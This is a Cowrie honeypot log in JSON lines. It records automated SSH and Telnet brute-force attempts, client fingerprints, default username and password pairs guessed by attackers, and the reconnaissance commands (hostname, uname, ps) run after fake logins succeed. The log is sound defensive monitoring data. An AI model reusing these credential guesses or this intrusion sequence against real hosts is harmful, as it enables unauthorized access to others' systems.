","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:34:52.143983Z","src_ip":"212.227.125.160","session":"2409532033e5"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"12345","message":"login attempt [ubuntu/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T06:34:54.055218Z","src_ip":"212.227.125.160","session":"e03ce46a2b17"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:56.149857Z","src_ip":"212.227.125.160","session":"e03ce46a2b17"}
{"eventid":"cowrie.login.success","username":"root","password":"qweasd","message":"login attempt [root/qweasd] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:34:57.280461Z","src_ip":"212.227.125.160","session":"2409532033e5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:34:59.480124Z","src_ip":"212.227.125.160","session":"2409532033e5"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-31T06:34:59.480933Z","src_ip":"212.227.125.160","session":"2409532033e5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"5.5","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:35:04.964842Z","src_ip":"212.227.125.160","session":"2409532033e5"}
{"eventid":"cowrie.session.closed","duration":"13.5","message":"Connection lost after 13.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:35:04.966114Z","src_ip":"212.227.125.160","session":"2409532033e5"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":46890,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff9503756f04","protocol":"ssh","message":"New connection: 201.148.180.50:46890 (1.2.3.4:22) [session: ff9503756f04]","sensor":"my-vps","timestamp":"2025-08-31T06:35:09.057194Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:35:10.288936Z","src_ip":"201.148.180.50","session":"ff9503756f04"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:35:10.290228Z","src_ip":"201.148.180.50","session":"ff9503756f04"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53416,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae2a952d04da","protocol":"ssh","message":"New connection: 212.227.125.160:53416 (1.2.3.4:22) [session: ae2a952d04da]","sensor":"my-vps","timestamp":"2025-08-31T06:35:15.648130Z"}
{"eventid":"cowrie.login.success","username":"root","password":"qweasd","message":"login attempt [root/qweasd] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:35:15.768927Z","src_ip":"201.148.180.50","session":"ff9503756f04"}
{"eventid":"cowrie.session.closed","duration":40.678932905197144,"message":"Connection lost after 40 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:35:16.476857Z","src_ip":"212.227.125.160","session":"212ef7ce2052"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:35:17.680383Z","src_ip":"212.227.125.160","session":"1f483f71213d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T06:35:17.681052Z","src_ip":"212.227.125.160","session":"1f483f71213d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:35:18.305182Z","src_ip":"201.148.180.50","session":"ff9503756f04"}
{"eventid":"cowrie.command.input","input":"ps aux | head -10","message":"CMD: ps aux | head -10","sensor":"my-vps","timestamp":"2025-08-31T06:35:18.305852Z","src_ip":"201.148.180.50","session":"ff9503756f04"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","size":28,"shasum":"e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767 after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:35:19.922592Z","src_ip":"201.148.180.50","session":"ff9503756f04"}
{"eventid":"cowrie.session.closed","duration":"10.9","message":"Connection lost after 10.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:35:19.923928Z","src_ip":"201.148.180.50","session":"ff9503756f04"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39688,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6f53f8c272c","protocol":"ssh","message":"New connection: 212.227.235.229:39688 (1.2.3.4:22) [session: a6f53f8c272c]","sensor":"my-vps","timestamp":"2025-08-31T06:35:30.007309Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:35:30.737122Z","src_ip":"212.227.235.229","session":"a6f53f8c272c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:35:30.738052Z","src_ip":"212.227.235.229","session":"a6f53f8c272c"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":11204,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b338c3952d3","protocol":"ssh","message":"New connection: 80.94.95.15:11204 (1.2.3.4:22) [session: 8b338c3952d3]","sensor":"my-vps","timestamp":"2025-08-31T06:35:31.016570Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T06:35:31.033546Z","src_ip":"80.94.95.15","session":"8b338c3952d3"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T06:35:31.084294Z","src_ip":"80.94.95.15","session":"8b338c3952d3"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"1234","message":"login attempt [ubnt/1234] failed","sensor":"my-vps","timestamp":"2025-08-31T06:35:31.353070Z","src_ip":"80.94.95.15","session":"8b338c3952d3"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"abcd1234","message":"login attempt [ubnt/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-31T06:35:32.405353Z","src_ip":"80.94.95.15","session":"8b338c3952d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57602,"dst_ip":"1.2.3.4","dst_port":22,"session":"383c96695873","protocol":"ssh","message":"New connection: 212.227.235.229:57602 (1.2.3.4:22) [session: 383c96695873]","sensor":"my-vps","timestamp":"2025-08-31T06:35:32.747447Z"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"1111","message":"login attempt [ubnt/1111] failed","sensor":"my-vps","timestamp":"2025-08-31T06:35:33.458489Z","src_ip":"80.94.95.15","session":"8b338c3952d3"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"password","message":"login attempt [ubnt/password] failed","sensor":"my-vps","timestamp":"2025-08-31T06:35:34.512094Z","src_ip":"80.94.95.15","session":"8b338c3952d3"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt123","message":"login attempt [ubnt/ubnt123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:35:35.566193Z","src_ip":"80.94.95.15","session":"8b338c3952d3"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:35:36.619793Z","src_ip":"80.94.95.15","session":"8b338c3952d3"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"1234567","message":"login attempt [ubuntu/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T06:35:36.865105Z","src_ip":"212.227.235.229","session":"a6f53f8c272c"}
{"eventid":"cowrie.session.closed","duration":"22.3","message":"Connection lost after 22.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:35:37.989600Z","src_ip":"212.227.125.160","session":"ae2a952d04da"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:35:38.745756Z","src_ip":"212.227.235.229","session":"a6f53f8c272c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"25.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 25.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:35:42.744685Z","src_ip":"212.227.125.160","session":"1f483f71213d"}
{"eventid":"cowrie.session.closed","duration":"86.6","message":"Connection lost after 86.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:35:42.990982Z","src_ip":"212.227.125.160","session":"1f483f71213d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54758,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb7d37bce267","protocol":"ssh","message":"New connection: 212.227.235.229:54758 (1.2.3.4:22) [session: eb7d37bce267]","sensor":"my-vps","timestamp":"2025-08-31T06:35:48.291360Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:35:48.292391Z","src_ip":"212.227.235.229","session":"eb7d37bce267"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:35:48.573647Z","src_ip":"212.227.235.229","session":"eb7d37bce267"}
{"eventid":"cowrie.login.failed","username":"kiran","password":"1234","message":"login attempt [kiran/1234] failed","sensor":"my-vps","timestamp":"2025-08-31T06:35:49.701570Z","src_ip":"212.227.235.229","session":"eb7d37bce267"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:35:50.990298Z","src_ip":"212.227.235.229","session":"eb7d37bce267"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57798,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e1c1e919bbb","protocol":"ssh","message":"New connection: 212.227.125.160:57798 (1.2.3.4:22) [session: 3e1c1e919bbb]","sensor":"my-vps","timestamp":"2025-08-31T06:35:51.389596Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:35:51.917571Z","src_ip":"212.227.125.160","session":"3e1c1e919bbb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:35:51.918342Z","src_ip":"212.227.125.160","session":"3e1c1e919bbb"}
{"eventid":"cowrie.login.success","username":"root","password":"aa123456","message":"login attempt [root/aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:35:53.229801Z","src_ip":"212.227.235.229","session":"ba86b49483c3"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"1234567","message":"login attempt [ubuntu/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T06:35:53.529634Z","src_ip":"212.227.125.160","session":"3e1c1e919bbb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37948,"dst_ip":"1.2.3.4","dst_port":23,"session":"ae522751e6aa","protocol":"telnet","message":"New connection: 212.227.235.229:37948 (1.2.3.4:23) [session: ae522751e6aa]","sensor":"my-vps","timestamp":"2025-08-31T06:35:54.623775Z"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:35:55.010992Z","src_ip":"212.227.125.160","session":"3e1c1e919bbb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":12811,"dst_ip":"1.2.3.4","dst_port":22,"session":"562a057e8410","protocol":"ssh","message":"New connection: 212.227.235.229:12811 (1.2.3.4:22) [session: 562a057e8410]","sensor":"my-vps","timestamp":"2025-08-31T06:35:56.022528Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:35:56.024065Z","src_ip":"212.227.235.229","session":"562a057e8410"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:35:56.238561Z","src_ip":"212.227.235.229","session":"562a057e8410"}
{"eventid":"cowrie.login.failed","username":"tigergraph","password":"tigergraph","message":"login attempt [tigergraph/tigergraph] failed","sensor":"my-vps","timestamp":"2025-08-31T06:35:57.143647Z","src_ip":"212.227.235.229","session":"562a057e8410"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:35:58.361983Z","src_ip":"212.227.235.229","session":"562a057e8410"}
{"eventid":"cowrie.session.closed","duration":"27.1","message":"Connection lost after 27.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:35:59.833771Z","src_ip":"212.227.235.229","session":"383c96695873"}
{"eventid":"cowrie.session.closed","duration":12.486753702163696,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:36:07.110460Z","src_ip":"212.227.235.229","session":"ae522751e6aa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38255,"dst_ip":"1.2.3.4","dst_port":23,"session":"7d4d3f5b2437","protocol":"telnet","message":"New connection: 212.227.235.229:38255 (1.2.3.4:23) [session: 7d4d3f5b2437]","sensor":"my-vps","timestamp":"2025-08-31T06:36:07.334380Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:36:08.656122Z","src_ip":"212.227.235.229","session":"ba86b49483c3"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T06:36:08.656785Z","src_ip":"212.227.235.229","session":"ba86b49483c3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"5.8","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:36:14.437497Z","src_ip":"212.227.235.229","session":"ba86b49483c3"}
{"eventid":"cowrie.session.closed","duration":"97.6","message":"Connection lost after 97.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:36:14.438830Z","src_ip":"212.227.235.229","session":"ba86b49483c3"}
{"eventid":"cowrie.session.closed","duration":12.761831998825073,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:36:20.096118Z","src_ip":"212.227.235.229","session":"7d4d3f5b2437"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38560,"dst_ip":"1.2.3.4","dst_port":23,"session":"308c7c961458","protocol":"telnet","message":"New connection: 212.227.235.229:38560 (1.2.3.4:23) [session: 308c7c961458]","sensor":"my-vps","timestamp":"2025-08-31T06:36:20.323547Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46364,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3dd68e77714","protocol":"ssh","message":"New connection: 212.227.235.229:46364 (1.2.3.4:22) [session: d3dd68e77714]","sensor":"my-vps","timestamp":"2025-08-31T06:36:29.961661Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:36:30.759534Z","src_ip":"212.227.235.229","session":"d3dd68e77714"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:36:30.760478Z","src_ip":"212.227.235.229","session":"d3dd68e77714"}
{"eventid":"cowrie.session.closed","duration":12.78063440322876,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:36:33.104109Z","src_ip":"212.227.235.229","session":"308c7c961458"}
